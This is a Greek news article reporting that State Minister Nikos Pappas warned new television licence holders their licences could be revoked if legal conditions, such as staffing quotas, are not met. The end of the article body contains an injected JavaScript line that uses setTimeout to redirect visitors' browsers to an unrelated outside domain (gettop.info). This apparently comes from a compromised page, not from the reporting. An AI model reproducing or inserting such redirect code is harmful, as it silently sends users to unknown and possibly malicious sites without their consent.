Παππάς σε καναλάρχες: Κίνδυνος ανάκλησης της άδειας αν…

0
4

 

Επισημάνσεις προς τους νέους καναλάρχες ότι οι άδειές τους θα ανακληθούν εφόσον δεν τηρηθούν οι προϋποθέσεις που έχουν τεθεί από το νόμο για τη λειτουργία των καναλιών απηύθυνε ο υπουργός Επικρατείας Νίκος Παππάς, κατά τις συναντήσεις που είχε σήμερα μαζί τους.

Εξερχόμενος από τις συναντήσεις ο υπουργός Επικρατείας σημείωσε ότι «όλοι έχουν συνείδηση της ευθύνης που ανέλαβαν και υπάρχουν υποχρεώσεις που προβλέπονται από το νόμο». Ανέφερε επίσης ότι τέτοιες συναντήσεις θα συνεχίσουν να γίνονται σε όλα τα επίπεδα, ώστε να γίνει ομαλά η μετάβαση στη νέα πραγματικότητα. Ο κ.Παππάς δεν θέλησε να απαντήσει αν θα γίνει δεκτό το αίτημα των νέων καναλαρχών να καταβάλουν την πρώτη δόση του τιμήματος για τις άδειες μετά την απόφαση του ΣτΕ, λέγοντας μόνο ότι οι αποφάσεις της διοίκησης ακολουθούν το σχεδιασμό.

Ο υπουργός Επικρατείας επανέλαβε τη θέση της κυβέρνησης ότι με τις προβλέψεις του νέου νόμου οι σταθμοί υποχρεούνται να απασχολούν τουλάχιστον 400 άτομα, υποστηρίζοντας μάλιστα ότι «για πρώτη φορά μπαίνει φρένο στη μείωση της απασχόλησης» και πρόσθεσε ότι είναι υποκριτική η στάση όσων κατηγορούσαν την κυβέρνηση για κατάργηση του διευθυντικού δικαιώματος με τη συγκεκριμένη πρόβλεψη του νόμουΕίναι υποκριτικό να μας επιτίθεται κάποιος γι’ αυτά τα ζητήματα», πρόσθεσε χαρακτηριστικά.

Ερωτηθείς για το ζήτημα των θεματικών αδειών, ο κ.Παππάς απάντησε ότι «δεν υπάρχει θέμα θεματικών αδειών αυτή τη στιγμή». Σημειώνεται ότι το Μαξίμου τις προηγούμενες ημέρες είχε αφήσει να εννοηθεί ότι η διαδικασία των θεματικών αδειών θα δρομολογείτο άμεσα.

 Τη μεγάλη ευθύνη που τους αναλογεί για την ενημέρωση του λαού υπογράμμισε ο υπουργός Επικρατείας Νίκος Παππάς στις συναντήσεις με τους ιδιοκτήτες των προσωρινών υπερθεματιστών των τηλεοπτικών αδειών.

Σύμφωνα με πληροφορίες του ΑΜΠΕ, ο κ. Παππάς αφού τους συνεχάρη, επισήμανε ότι εκκρεμεί ο έλεγχος του πόθεν έσχες, υπογραμμίζοντας τη μεγάλη ευθύνη που τους αναλογεί για την ενημέρωση του ελληνικού λαού. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here